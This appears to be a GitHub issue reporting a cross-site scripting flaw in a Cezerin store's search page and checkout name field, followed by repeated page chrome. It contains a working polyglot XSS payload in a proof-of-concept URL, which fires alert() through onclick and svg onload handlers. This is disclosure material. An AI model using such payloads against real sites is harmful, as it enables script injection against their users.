[XSS]: XSS on search #510

Baker68 · 2022-06-28T11:35:29Z

PoC :

https://plusha.cezerin.net/search?search=jaVasCript:/*-/*`/*\`/*%27/*%22/**/(/*%20*/oNcliCk=alert()%20)//%0D%0A%0D%0A//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E\x3csVg/%3CsVg/oNloAd=alert()//%3E\x3e

Same issue is present on First Name checkout input fields.

The text was updated successfully, but these errors were encountered:

Baker68 added the bug Something isn't working label Jun 28, 2022

Baker68 assigned ValerioBob Jun 28, 2022

RalphDNB mentioned this issue Mar 27, 2024

[Snyk] Security upgrade @tinymce/tinymce-react from 4.3.2 to 5.0.0 Aperture-Science-Enrichment-Center/SomeAPITestProject2#28

Open

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

[XSS]: XSS on search #510

[XSS]: XSS on search #510

Baker68 commented Jun 28, 2022 •

edited

[XSS]: XSS on search #510

[XSS]: XSS on search #510

Comments

Baker68 commented Jun 28, 2022 • edited

Baker68 commented Jun 28, 2022 •

edited